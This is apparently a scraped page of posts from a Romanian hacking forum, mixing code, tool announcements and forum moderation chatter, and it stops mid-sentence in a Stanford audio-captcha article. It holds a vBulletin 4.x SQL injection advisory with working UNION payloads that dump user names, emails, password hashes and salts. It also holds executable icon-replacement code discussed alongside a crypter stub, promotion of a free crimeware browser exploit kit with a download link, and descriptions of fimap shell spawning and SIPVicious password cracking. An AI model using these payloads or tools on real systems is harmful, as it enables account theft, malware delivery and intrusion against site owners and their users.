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Portiunea de cod detectabila... Nu mai stiu care e, probabil Loader-ul inca nu e, e control ActiveX. Vezi partea de "dropping" unde stub-ul se citeste singur incarca executabilul in memorie.
Nu stiu de ce nu merge. De fapt schimba iconita, dar STRICA executabilul. Poate te ajuta cu ceva: /* Nume: Icon Changer portat din Visual Basic 6 Autor: Gheorghe Vasile Status: Functionare partiala */ #include <stdio.h> #include <stdlib.h> #include <windows.h> typedef struct ICONDIR { short idReserved; short idType; short idCount; } ICONDIR; typedef struct ICONDIRENTRY { unsigned char bWidth; unsigned char bHeight; unsigned char bColorCount; unsigned char bReserved; short wPlanes; short wBitCount; int dwBytesInRes; int dwImageOffset; } ICONDIRENTRY; typedef struct GRPICONDIR { short idReserved; short idType; short idCount; } GRPICONDIR; typedef struct GRPICONDIRENTRY { unsigned char bWidth; unsigned char bHeight; unsigned char bColorCount; unsigned char bReserved; short wPlanes; short wBitCount; long dwBytesInRes; long dwIconID; } GRPICONDIRENTRY; typedef struct Dat { unsigned char *Data; } Dat; typedef struct Ico { ICONDIR IcoDir; ICONDIRENTRY *Entries; Dat *IcoData; } Ico; typedef struct IcoExe { GRPICONDIR IcoDir; GRPICONDIRENTRY *Entries; } IcoExe; Ico OpenIconFile(const char *Filename) { Ico t; FILE *fisier; int i; fisier = fopen(Filename, "rb"); fread(&t.IcoDir, sizeof(ICONDIR), 1, fisier); t.Entries = (ICONDIRENTRY *)malloc(sizeof(ICONDIRENTRY) * t.IcoDir.idCount); t.IcoData = (Dat *)malloc(sizeof(Dat) * t.IcoDir.idCount); for(i = 0; i <= t.IcoDir.idCount - 1; i++) { fseek(fisier, 6 + (16 * i), SEEK_SET); fread(&t.Entries[i], sizeof(ICONDIRENTRY), 1, fisier); t.IcoData[i].Data = (unsigned char *)malloc(t.Entries[i].dwBytesInRes); fseek(fisier, t.Entries[i].dwImageOffset, SEEK_SET); t.IcoData[i].Data = (unsigned char *)malloc(t.Entries[i].dwBytesInRes); fread(t.IcoData[i].Data, t.Entries[i].dwBytesInRes, 1, fisier); } fclose(fisier); return t; } IcoExe MakeIcoExe(Ico IconFile) { IcoExe t; long i; t.IcoDir.idCount = IconFile.IcoDir.idCount; t.IcoDir.idType = 1; t.IcoDir.idReserved = 0; t.Entries = (GRPICONDIRENTRY *)malloc(sizeof(GRPICONDIRENTRY) * t.IcoDir.idCount); for(i = 0; i <= t.IcoDir.idCount - 1; i++) { t.Entries[i].bColorCount = IconFile.Entries[i].bColorCount; t.Entries[i].bHeight = IconFile.Entries[i].bHeight; t.Entries[i].bReserved = IconFile.Entries[i].bReserved; t.Entries[i].bWidth = IconFile.Entries[i].bWidth; t.Entries[i].dwBytesInRes = IconFile.Entries[i].dwBytesInRes; t.Entries[i].dwIconID = i + 1; t.Entries[i].wBitCount = IconFile.Entries[i].wBitCount; t.Entries[i].wPlanes = IconFile.Entries[i].wPlanes; } return t; } int ReplaceIcoInExe(const char *FileName, Ico IcoFile) { int ret, i, aux; HANDLE hWrite; IcoExe Exe; unsigned char *D; hWrite = BeginUpdateResource(FileName, 0); Exe = MakeIcoExe(IcoFile); aux = 6 + 14 * Exe.IcoDir.idCount; D = (unsigned char *)malloc(aux); CopyMemory(D, &Exe.IcoDir, 6); for(i = 0; i <= Exe.IcoDir.idCount - 1; i++) { CopyMemory(&D[6 + 14 * i], &Exe.Entries[i], 14); } ret = UpdateResource(hWrite, RT_GROUP_ICON, MAKEINTRESOURCE(1), 0, D, aux); if(ret == 0) { EndUpdateResource(hWrite, 1); return 0; } for(i = 0; i <= Exe.IcoDir.idCount - 1; i++) { ret = UpdateResource(hWrite, RT_ICON, MAKEINTRESOURCE(Exe.Entries[i].dwIconID), 0, IcoFile.IcoData[i].Data, Exe.Entries[i].dwBytesInRes); } ret = EndUpdateResource(hWrite, 0); if(ret == 0) return 0; else return 1; } int main() { printf("Rezultat: %d\n\n", ReplaceIcoInExe("F:\\x.exe", OpenIconFile("F:\\g.ico"))); return 0; }
Option Explicit Public Type ICONDIR idReserved As Integer ' Reserved (must be 0) idType As Integer ' Resource Type (1 for icons) idCount As Integer ' How many images? 'ICONDIRENTRY idEntries[1]; // An entry for each image (idCount of 'em) End Type Public Type ICONDIRENTRY bWidth As Byte ' Width, in pixels, of the image bHeight As Byte ' Height, in pixels, of the image bColorCount As Byte ' Number of colors in image (0 if >=8bpp) bReserved As Byte ' Reserved ( must be 0) wPlanes As Integer ' Color Planes wBitCount As Integer ' Bits per pixel dwBytesInRes As Long ' How many bytes in this resource? dwImageOffset As Long ' Where in the file is this image? End Type Public Type GRPICONDIR idReserved As Integer ' Reserved (must be 0) idType As Integer ' Resource Type (1 for icons) idCount As Integer ' How many images? 'ICONDIRENTRY idEntries[1]; // An entry for each image (idCount of 'em) End Type Public Type GRPICONDIRENTRY bWidth As Byte ' Width, in pixels, of the image bHeight As Byte ' Height, in pixels, of the image bColorCount As Byte ' Number of colors in image (0 if >=8bpp) bReserved As Byte ' Reserved ( must be 0) wPlanes As Integer ' Color Planes wBitCount As Integer ' Bits per pixel dwBytesInRes As Long ' How many bytes in this resource? dwIconID As Integer ' Where in the file is this image? End Type Public Type Dat Data() As Byte End Type Public Type Ico IcoDir As ICONDIR Entries() As ICONDIRENTRY IcoData() As Dat End Type Public Type IcoExe IcoDir As GRPICONDIR Entries() As GRPICONDIRENTRY End Type Private Declare Function BeginUpdateResource Lib "kernel32.dll" Alias "BeginUpdateResourceA" (ByVal pFileName As String, ByVal bDeleteExistingResources As Long) As Long Private Declare Function UpdateResource Lib "kernel32.dll" Alias "UpdateResourceA" (ByVal hUpdate As Long, ByVal lpType As Long, ByVal lpName As Long, ByVal wLanguage As Long, lpData As Any, ByVal cbData As Long) As Long Private Declare Function EndUpdateResource Lib "kernel32.dll" Alias "EndUpdateResourceA" (ByVal hUpdate As Long, ByVal fDiscard As Long) As Long Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Const RT_ICON As Long = 3& Private Const DIFFERENCE As Long = 11 Private Const RT_GROUP_ICON As Long = (RT_ICON + DIFFERENCE) '// ReplaceIcoInExe "C:\EXEtoReplace.exe", OpenIconFile("C:\NewIcon.ico") Public Function OpenIconFile(FileName As String) As Ico Dim t As Ico 'structure temporaire Dim X As Long 'compteur 'on ouvre le fichier Open FileName For Binary As #1 'on récup?re l'entete du fichier Get #1, , t.IcoDir 'redimensionne au nombre d'icones ReDim t.Entries(0 To t.IcoDir.idCount - 1) ReDim t.IcoData(0 To t.IcoDir.idCount - 1) 'pour chaque icones For X = 0 To t.IcoDir.idCount - 1 'récup?re l'entete de l'icone Get #1, 6 + 16 * X + 1, t.Entries(X) 'redimensionne ? la taille des données ReDim t.IcoData(X).Data(t.Entries(X).dwBytesInRes - 1) 'récup?re les données Get #1, t.Entries(X).dwImageOffset + 1, t.IcoData(X).Data Next 'ferme le fichier Close #1 'renvoie les données OpenIconFile = t End Function Private Function MakeIcoExe(IconFile As Ico) As IcoExe Dim t As IcoExe 'structure temporaire Dim X As Long 'compteur 'nombre d'icones t.IcoDir.idCount = IconFile.IcoDir.idCount 'type : Icone = 1 t.IcoDir.idType = 1 'chaque entrée ReDim t.Entries(IconFile.IcoDir.idCount - 1) 'pour chaque entrée For X = 0 To t.IcoDir.idCount - 1 'entete d'icones t.Entries(X).bColorCount = IconFile.Entries(X).bColorCount t.Entries(X).bHeight = IconFile.Entries(X).bHeight t.Entries(X).bReserved = IconFile.Entries(X).bReserved t.Entries(X).bWidth = IconFile.Entries(X).bWidth t.Entries(X).dwBytesInRes = IconFile.Entries(X).dwBytesInRes t.Entries(X).dwIconID = X + 1 t.Entries(X).wBitCount = IconFile.Entries(X).wBitCount t.Entries(X).wPlanes = IconFile.Entries(X).wPlanes Next 'renvoie la structure MakeIcoExe = t End Function Public Function ReplaceIcoInExe(FileName As String, IcoFile As Ico) As Boolean Dim hWrite As Long 'handle de modification Dim Exe As IcoExe 'structure de ressource icone Dim ret As Long 'valeur de retour Dim X As Long 'compteur Dim D() As Byte 'buffer 'obtient un handle de modification hWrite = BeginUpdateResource(FileName, 0) 'si échec, on quitte If hWrite = 0 Then ReplaceIcoInExe = False: Exit Function 'sinon, on lit l'icone Exe = MakeIcoExe(IcoFile) 'on redimmensionne le buffer ReDim D(6 + 14 * Exe.IcoDir.idCount) 'on copie les données dans le buffer CopyMemory ByVal VarPtr(D(0)), ByVal VarPtr(Exe.IcoDir), 6 'pour chaque icone For X = 0 To Exe.IcoDir.idCount - 1 'on copie les données CopyMemory ByVal VarPtr(D(6 + 14 * X)), ByVal VarPtr(Exe.Entries(X).bWidth), 14& Next 'on met ? jour la ressource groupe icone ret = UpdateResource(hWrite, RT_GROUP_ICON, 1, 0, ByVal VarPtr(D(0)), UBound(D)) 'si échec, on quitte If ret = 0 Then ReplaceIcoInExe = False: EndUpdateResource hWrite, 1: Exit Function 'on met ? jour chaque ressource icone For X = 0 To Exe.IcoDir.idCount - 1 ret = UpdateResource(hWrite, RT_ICON, Exe.Entries(X).dwIconID, 0, ByVal VarPtr(IcoFile.IcoData(X).Data(0)), Exe.Entries(X).dwBytesInRes) Next 'on enregsitre dans le fichier executable ret = EndUpdateResource(hWrite, 0) 'si échec, on quitte If ret = 0 Then ReplaceIcoInExe = False: Exit Function 'sinon succ?s ReplaceIcoInExe = True End Function Maine, daca stau pe acasa, il portez eu in C/C++. Adica azi, ca e aproape 4... Sau asta: Option Explicit Type DIB_HEADER Size As Long Width As Long Height As Long Planes As Integer Bitcount As Integer Reserved As Long ImageSize As Long End Type Type ICON_DIR_ENTRY bWidth As Byte bHeight As Byte bColorCount As Byte bReserved As Byte wPlanes As Integer wBitCount As Integer dwBytesInRes As Long dwImageOffset As Long End Type Type ICON_DIR Reserved As Integer Type As Integer Count As Integer End Type Type DIB_BITS Bits() As Byte End Type Public Enum Errors FILE_CREATE_FAILED = 1000 FILE_READ_FAILED INVALID_PE_SIGNATURE INVALID_ICO NO_RESOURCE_TREE NO_ICON_BRANCH CANT_HACK_HEADERS End Enum Public Function ReplaceIcons(Source As String, Dest As String, Error As String) As Long Dim IcoDir As ICON_DIR Dim IcoDirEntry As ICON_DIR_ENTRY Dim tBits As DIB_BITS Dim Icons() As IconDescriptor Dim lngRet As Long Dim BytesRead As Long Dim hSource As Long Dim hDest As Long Dim ResTree As Long hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0) If hSource >= 0 Then If Valid_ICO(hSource) Then SetFilePointer hSource, 0, 0, 0 ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0& ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0& SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0 ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0& CloseHandle hSource hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0) If hDest >= 0 Then If Valid_PE(hDest) Then ResTree = GetResTreeOffset(hDest) If ResTree > 308 Then ' Sanity check lngRet = GetIconOffsets(hDest, ResTree, Icons) SetFilePointer hDest, Icons(1).Offset, 0, 0 WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0& If Not HackDirectories(hDest, ResTree, Icons(1).Offset, IcoDirEntry) Then Err.Raise CANT_HACK_HEADERS, App.EXEName, "Unable to modify directories in target executable. File may not contain any icon resources." End If Else Err.Raise NO_RESOURCE_TREE, App.EXEName, Dest & " does not contain a valid resource tree. File may be corrupt." CloseHandle hDest End If Else Err.Raise INVALID_PE_SIGNATURE, App.EXEName, Dest & " is not a valid Win32 executable." CloseHandle hDest End If CloseHandle hDest Else Err.Raise FILE_CREATE_FAILED, App.EXEName, "Failed to open " & Dest & ". Make sure file is not in use by another program." End If Else Err.Raise INVALID_ICO, App.EXEName, Source & " is not a valid icon resource file." CloseHandle hSource End If Else Err.Raise FILE_CREATE_FAILED, App.EXEName, "Failed to open " & Source & ". Make sure file is not in use by another program." End If ReplaceIcons = 0 Exit Function ErrHandler: ReplaceIcons = Err.Number Error = Err.Description End Function Public Function Valid_ICO(hFile As Long) As Boolean Dim tDir As ICON_DIR Dim BytesRead As Long If (hFile > 0) Then ReadFile hFile, tDir, Len(tDir), BytesRead, ByVal 0& If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then Valid_ICO = True Else Valid_ICO = False End If Else Valid_ICO = False End If End Function Am niste probleme stupide, pe o structura din C. "Imi sare" peste un cam din structura, ca si cum nu ar fi. Sa vad daca reusesc sa scap de problema.
Fimap The local and remote file inclusion auditing and exploitation v0.9 fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable. Changelog Cookie scanning and attacking. New ‘AutoAwesome‘ operating mode. Dot-Truncation mode for breaking suffixes on windows servers. New –force-os switch which lets you define in advance which OS to assume. Better logfile kickstarter injection. Dynamic RFI encoder for webservers which interpret your (PHP) code (–rfi_encode=php_b64). Tons of bugfixes. Lots of stuff I forgot to mention. Features Check a Single URL, List of URLs, or Google results fully automaticly. Can identify and exploit file inclusion bugs. Relative\Absolute Path Handling. Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation. Remotefile Injection. Logfile Injection. (FimapLogInjection) Test and exploit multiple bugs: include() include_once() require() require_once() You always define absolute pathnames in the configs. No monkey like pathes like: ../etc/passwd ../../etc/passwd ../../../etc/passwd But in cases where the server doesn’t print messages you can enable the monkey-like checking with --enable-blind! Has an interactive exploit mode which… …can spawn a shell on vulnerable systems. …can spawn a reverse shell on vulnerable systems. …can do everything you have added in your payload-dict inside the config.py Add your own payloads and pathes to the config.py file. Has a Harvest mode which can collect URLs from a given domain for later pentesting. Goto FimapHelpPage for all features. Works also on windows. Can handle directories in RFI mode like: <? include ($_GET["inc"] . "/content/index.html"); ?> <? include ($_GET["inc"] . "_lang/index.html"); ?> where Null-Byte is not possible. Can use proxys. Scans GET and POST variables. Has a very small footprint. Can attack also windows servers! (WindowsAttack) Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment) Cookie and Header scanning and exploiting. Download: http://code.google.com/p/fimap/ Sursa: Fimap The local and remote file inclusion auditing and exploitation v0.9 released « IT Vulnerability & ToolsWatch
Download F-Secure AntiVirus for Mac F-Secure, one of the top security firms for PC, have released F-Secure AntiVirus for Mac with fast, real-time protection for home users and businesses. The software was in beta till recently, and we guess the recent malware attacks have hurried them to come out of beta and release the final version. For many Apple fanboys, “antivirus for Mac” is like an oxymoron. Apple has always boasted about how safe and secure the Mac ecosystem is. But the recent malware attacks have tarnished their image a great deal. As Brian X. Chen points out, There’s nothing about the Mac that makes it inherently more secure than Windows– indeed, the Mac platform has been easily penetrated in the Pwn2Own hacking contest in years past. But Windows has always been a juicier target for malicious hackers because it has much larger market share than the Mac. So, an antivirus security suite is now a necessity for your Mac more than ever. With gradual increase in sales of Macbooks, Macbook Airs, Macbook Pros and iMacs, we can surely expect many more malware and trojans cropping up on Mac. Though there are other options present, F-Secure antivirus for Mac is worth considering. F-Secure Anti-virus for Mac F-Secure Anti-virus for Mac is your key to be safe and tension-free. It will protect you from viruses and configure your firewall to help you to make sure your precious data stays where it should be. Since F-Secure Anti Virus for Mac is constantly updated, you’ll always be protected from the latest threats. The installable is less than 22 MB and it needs around 65 MB space on your hard drive. Installation is simple, straight-forward and a breeze to deal with. Once installed, it runs in the background, without taking too much memory and protects your Mac from various threats in real time. As you expect, the service is not free. It costs around €32 (~$45) per year for 1 Mac device. You can download and try F-Secure antivirus for Mac for Free (1 month) by using the campaign code “AVMAGL“. Download: http://www.f-secure.com/en/web/home_global/keys-in-the-cloud Sursa: Download F-Secure AntiVirus for Mac - Anti-Virus Mac, AntiVirus for Mac, Download F-secure antivirus Mac, f-secure, F-secure antivirus for Mac, Mac Antivirus, mac malware - Technically Personal!
Puteti folosi si asta: http://www.roaringpenguin.com/products/pppoe Trebuie compilata sursa, dar ar trebui sa va descurcati. Eu il foloseam pe Slackware, dar cred ca l-am folosit si pe Backtrack. Pentru configurare parca era pppoe-setup, iar ca sa te conectezi - pppoe-start (dar dupa configurare era recomandat un pppoe-connect, apoi Ctrl + C dupa conectare) . Pentru cei cu net prin USB, doar la RDS stiu cum e. Aveti ZTE_LinuxUI, il instalati si rulati. Eu cred ca am avut niste probleme, nu mai stiu cu ce distributie, cand in fisierul de configurare trebuia specificat portul USB in care era bagat. Dar na, aveti Network Manager, 2 click-uri si gata conexiunea. Si lumea zice ca Linux-ul e greu de folosit...
NU TRIMIT EU MAIL BA. Nu am eu acel mail.
Cred ca numele spune totul. Eu l-am gasit extrem de util, am cautat ceva si am gasit mult mai multe lucruri interesante. Link: http://findpdf.net/
Nu ne dezvalui si noua cunostintele tale?
Scuza-ma te rog. Ban. Topicuri create de el: http://rstcenter.com/forum/search.php?do=finduser&u=42523&starteronly=1 Total: 16 - 7 la RST Market - 3 la Offtopic - 2 la Cereri - 2 la Pranks - 1 la Ajutor - 1 topic util la "Conturi trackere" Deci nu prea a contribuit la forum si se gaseste el sa comenteze. Motive pentru al II-lea ban: - offtopic - postul sau nu are legatura cu subiectul discutiei - poola mea - limbaj de IRC - poola mea - limbaj inadecvat - cont dublu - post la Cereri desi nu are 10 postui (na) Da, jumatate ar trebui sa fie banati, dar ei sunt multi, eu sunt unul singur. Si incep cu cei care comenteaza. Si nu ti-am dat ban pe primul cont, ai primit doar un avertisment. Si vor fi banati! Multi! Cand va veni ziua cea mare, negura banului se va abate asupra conturilor neispravitilor care sunt in plus pe acest "Pamant". Da, eu sunt Dumnezeu. Desigur, banurile o sa apara cand voi avea mai mult timp liber.
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
Nytro replied to Nytro's topic in Exploituri
Da, si eu tot de el stiu, si stiu de destul timp de acel post. O fi cine stie ce plagiator ratat, sau o fi aceeasi persoana... -
http://rstcenter.com/forum/search.php?do=finduser&u=42523&starteronly=1 Ai un singur topic util creat: http://rstcenter.com/forum/34259-%60%60free%60%60-invitatii-filelist.rst De te legi de altii? Vezi si asta: http://rstcenter.com/forum/35322-off-topic.rst#post239664 Oricum: avertisment pentru Offtopic, nu l-ai ajutat cu nimic. Cum mai aveai 2 avertismente, ai primit ban automat. Si e treaba noastra, a administratorilor si a moderatorilor, sa decidem ce se intampla cand cineva nu are cele 10 posturi pentru a face o cerere.
Asa ca idee, ripoff, cel care a deschis aceasta problema: Total: 49 topicuri create - 15 la Offtopic - 10 la Ajutor - 3 la Cereri Adica 28 de topicuri... Topicuri utile: tutoriale, programe... - Cam 12 - 15 (cele de la Market nu le contorizez niciunde) Si pune problema ca se face prea mult ofttopic. Asta nu imi place. PS: Cand voi avea timp, cu aceasta metodologie voi decide cine paraseste forumul. Un membru ca ripoff nu stiu daca ar ramane sau nu, dar sunt multi care stau mult mai prost cu diferenta intre topicuri utile si tampenii postate la offtopic. Dar nu doar topicurile create conteaza. Conteaza mult si posturile la Cereri si Ajutor, dar posturile in care un membru ajuta pe cineva, nu cele in care cere ajutorul. Oricum inca nu stiu exact cum voi proceda, dar daca veti avea Ban reason: "Membru inutil" sau ceva asemanator inseamna ca am dat o raita pe la posturile voastre si am decis ca sunteti in plus. Alt exemplu: nedo: Total topicuri create - 17: - 8 la Cereri - 6 la Ajutor Topicuri "utile": 3 Restul de 600 de posturi nu stiu pe unde sunt. Nu imi purtati (inca) pica, voi decide ce voi face cand voi avea mult timp liber. Si nu am spus ca voi doi, pe care v-am dat exemplu, ati primi ban, probabil voi nu ati primi, dar astfel voi gandi situatia la momentul oportun.
Lasand asta... Da, ce-i drept se posteaza mult mai mult aici. Motivul e simplu: e mult mai usor sa discuti despre Coca-Cola vs Pepsi decat despre compilarea kernelului de exemplu. Si lumea nu se chinuie sa invete cate ceva... Vreau sa fac ceva legat de membrii stupizi si inutili ai forumului care posteaza doar aici, CERERI si Ajutor, insa nu am timp momentan. Oricum, categoria asta nu strica. Se invata multe de aici, doar ca multe lucruri care nu au legatura cu IT-ul.
Impassioned Framework Download - Another Crimeware Available for Free ! : The Hacker News Russo is the creator of Impassioned Framework - Browser Exploitation Kit, a subscription-based software vulnerability exploit service. He is 23 year old the young hacker, This toolkits designed to be stitched into a Web site and probe visitor PCs for security holes that can be used to surreptitiously install malicious software. Impassioned Framework Recent Attack : Security weaknesses in the hugely popular file-sharing Web site thepiratebay.org have exposed the user names, e-mail and Internet addresses of more than 4 million Pirate Bay users using this Kit. Browsers Affected : - Chrome - Firefox - Msie 6 - Msie 7 - Msie 8 - Opera - Safari Os Affected : - Windows x - Unix and OS X NON AFFECTED Best exploits currently available: - MS09_002 - MS09_043 - MS Dshow - iepeers.dll - Firefox escape - Firefox CompareTo - Java Calendar - Adobe Reader Lib - Adobe Reader newPlayer - Adobe Flash 9 - Adobe Flash 10 Black Market Prices: $1,399 EURO / 1 MONTHS LICENSE. $2,999 EURO / 6 MONTHS LICENSE. $3,999 EURO / 12 MONTHS LICENSE. But Now Impassioned Framework is Available for Free Here !! Download ,1.14 MB - Multiupload.com - upload your files to multiple file hosting sites! Purpose Of Public Release: All Most wanted Crimeware kits are now available for free everywhere, this gives more chance to every Security pro to do more Research on them and also Antivirus Companies should now cover all these security holes/Exploits as soon as possible in their Next Update. Download: http://www.multiupload.com/9ELC2CART6 Sursa: Impassioned Framework Download - Another Crimeware Available for Free ! ~ THN : The Hackers News
Hacking Exposed VoIP/SIP - SIPVicious What is SIPVicious tool suite? SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools: * svmap - this is a sip scanner. Lists SIP devices found on an IP range * svwar - identifies active extensions on a PBX * svcrack - an online password cracker for SIP PBX * svreport - manages sessions and exports reports to various formats * svcrash - attempts to stop unauthorized svwar and svcrack scans Requirements Python SIPVicious works on any system that supports python 2.4 or greater. Operating System It was tested on the following systems: * Linux * Mac OS X * Windows * FreeBSD 6.2 * Jailbroken iPhone with python installed If you use it on systems that are not mentioned here please let me know goes it goes. Hacking Exposed VoIP/SIP VoIP systems becoming increasingly popular, attracted people are not only legitimate users that are looking to use it in their business but those who would like to make free calls at other people’s expense. SIP devices are often attacked, with the intent of finding the username/password of accounts on that device. VoIP attacks are found over misconfiguration or problems while implementing the PBX system. For testing these vulnerabilities we can use SIPVicious which is a set of tools that can be used to audit SIP based VoIP systems. It consists of five tools: * svmap – this is a sip scanner. Lists SIP devices found on an IP range * svwar – identifies active extensions on a PBX * svcrack – an online password cracker for SIP PBX * svreport – manages sessions and exports reports to various formats * svcrash – attempts to stop unauthorized svwar and svcrack scans This set of tools is written in Python and can be used on different operating systems. To better understand the way it works we can use the following scenarios: – Running svmap to look for SIP phones: box $ ./svmap.py | SIP Device | User Agent | —————————————————— | | Asterisk PBX | | | unknown | box $ Here we can find an Asterisk PBX server detected on - Running svwar with default options on the target Asterisk PBX, these accounts can be used for calling: box $ ./svwar.py | Extension | Authentication | —————————— | 202 | reqauth | | 203 | reqauth | | 200 | reqauth | | 201 | noauth | box $ There are 4 extensions located, from 200 through 203 and 201 does not require authorization while the rest requires authorization. - Using svcrack with the optimization enabled can help in discovering number based password as it just tries three-digit number combinations in order until it finds the password. box $ ./svcrack.py –u 201 | Extension | Password | ———————— | 201 | 201 | box $ Password for extension 201 is 201, as shown above. To see how the attack works we can use –vv as follows: ]svcrack.py –u 201 –vv ].and the screen will display what combination it is trying. - The cracker can also use a dictionary file full of possible passwords. box $ ./svcrack.py –u 203 \ -d dictionary.txt | Extension | Password | ———————— | 203 | ascript | box $ If you want to secure your VoIP/SIP, you need to start by setting the Firewall level to allow access for only a specific IP group and add the list of static IP addresses that are going to use the VoIP. If you are working remotely it will be also important to enable VPN for authenticating and encrypting your connection. Sursa: Hacking Exposed VoIP/SIP | SecTechno SIPVicious: http://code.google.com/p/sipvicious/
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
Nytro posted a topic in Exploituri
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability ==================================================================== #vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability# ==================================================================== # # # 888 d8 888 _ 888 ,d d8 # # e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ # # d888 888 d888 888 888d8b 888 888b 888 888 # # 8888 888 / 888 888 888Y88b 888 8888 888 888 # # Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 # # "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ # # # ==================================================================== #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst# ==================================================================== #[+] Discovered By : D4rkB1t #[+] Site : NaN #[+] support e-mail : d4rkb1t@live.com Product: http://www.vbulletin.com Version: 4.0.x Dork : inurl:"search.php?search_type=1" -------------------------- # ~Vulnerable Codes~ # -------------------------- /vb/search/searchtools.php - line 715; /packages/vbforum/search/type/socialgroup.php - line 201:203; -------------------------- # ~Exploit~ # -------------------------- POST data on "Search Multiple Content Types" => "groups" &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# More info: http://j0hnx3r.org/?p=818 -------------------------- # ~Advice~ # -------------------------- Vendor already released a patch on vb#4.1.3. UPDATE NOW! ==================================================================== # 1337day.com [2011-5-21] ==================================================================== Sursa: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r E public (thanks "d") de ceva timp, dar vad ca acum apare si pe exploit-db. Video Demonstration by TinK: -
Eu sunt de parere ca e invers, si ca anume socializarea reala duce la socializare online. Adica, eu adaug ca "prieten" pe cineva pe Facebook, sau ma adauga cineva dupa ce ne cunoastem in viata de zi cu zi. Am doar cativa "prieteni" online pe care nu ii cunosc in viata de zi cu zi. Si nu cred ca dauneaza statul mult pe retelele de socializare. Poti afla extrem de multe lucruri despre prieteni de acolo...
Stanford computer scientists find Internet security flaw BY MELISSAE FELLET Researchers at the Stanford Security Laboratory create a computer program to defeat audio captchas on website account registration forms, revealing a design flaw that leaves them vulnerable to automated attacks. Stanford researchers have found an audible security weakness on the Internet. If you've ever registered for online access to a website, it's likely you were required as part of the process to correctly read a group of distorted letters and numbers on the screen. That's a simple test to prove you're a human, not a computer program with malicious intent. Though computers are good at filling out forms, they struggle to decipher these wavy images crisscrossed with lines, known as captchas (short for Completely Automated Public Turing test to tell Computers and Humans Apart). But there's a second type of captcha, and it may pose more of a security weakness. These audio captchas, designed to help the visually impaired, require users to accurately listen to a string of spoken letters and/or numbers disguised with background noise. John Mitchell, a professor of computer science, postdoctoral researcher Elie Bursztein and colleagues built a computer program that could listen to and correctly decipher commercial audio captchas used by Digg, eBay, Microsoft, Yahoo and reCAPTCHA, a company that creates captchas. The researchers presented their results during a symposium on security and privacy in Oakland, Calif. The Stanford program, called Decaptcha, successfully decoded Microsoft's audio captcha about 50 percent of the time. It correctly broke only about 1 percent of reCAPTCHA's codes, the most difficult ones of those tested, but even this small success rate is considered trouble for websites such as YouTube and Facebook that get hundreds of millions of visitors each day. Imagine a large network of malicious computers creating many fake accounts on YouTube. This robot network of accounts could highly rate the same video, falsely increasing its popularity and thereby its advertising revenue. "Bot" networks could also swamp email accounts with spam messages. Decoding sounds Computers have a tough time attempting to read image captchas, but Mitchell and Bursztein wondered if audio captchas were safe from automated attacks, too. The researchers taught their program to recognize the unique sound patterns for every letter of the alphabet, as well as numeral digits. Then they challenged their software to decode audio captchas it had never heard before. The program worked by identifying the sound shapes in the target captcha file, comparing them to those stored in its memory. It worked – the software could to some extent imitate human hearing. "In the battle of humans versus computers, we lost round one for audio captchas," Bursztein said. "But we have a good idea of what round two should be." Designing captchas is challenging. The tests must be simple enough for users to answer quickly, yet complicated enough so computers struggle to decipher the patterns. Background noise in an audio captcha can confuse computers, but little is known about the types of noises that trip them up the most. The researchers generated 4 million audio captchas mixed with white noise, echoes or music, and challenged the program to decode them. After training Decaptcha with some samples, they took it for a test drive. The program easily defeated captchas mixed with static or repetition, with a 60 to 80 percent success rate, but background music made the task more difficult. Decaptcha removes the background noise from each audio file, leaving distinctively shaped spikes of energy for each digit or letter in the captcha. The program clearly isolates these spikes from white noise or echoes. But when the captcha contains noises that mimic these energy spikes, Decaptcha is often confused. Building a program to solve captchas is "an interesting test case for machine learning technology," said Mitchell. "For audio, it's in a realm where machines should do better than humans." Add meaning And they do, until they have to think like us. Music lyrics or garbled voices are forms of semantic noise – sounds that carry meaning. Humans can recognize a message mixed with semantic noise, but computers can't distinguish the two clearly. Decaptcha correctly solved only about 1 percent of these captchas. Of the commercial captchas the team tested, reCAPTCHA was the strongest because it contains background conversation and other semantic noise. Microsoft and Digg have recently changed their audio captchas to use this technology, Bursztein said. But the creation of this latest captcha cracker shows that even the best approach isn't secure enough. "The replacement technology isn't there yet, but we've pinpointed the problem," he said. Citing data obtained from eBay, the researchers say about 1 percent of people who register at the site use audio captchas. That's enough users to warrant an effort to strengthen this security device. The researchers suggest programmers tap into our human ability to understand meaning in sounds to improve future captchas. More secure puzzles could include background music or entire words instead of a string of letters. But the team cautions that programmers need to keep the human user in mind. If the captcha is too complicated, legitimate users won't be able to decode it. Despite efforts to strengthen audio captchas against computer attacks, they will, like visual captchas, still be vulnerable to crowdsourced attacks by a group of people manually solving captchas for low wages. Captchas are vital to freedom on the Internet, the researchers say, as the value of many social media sites depends on the assumption that fellow users are humans. "Captchas are a big 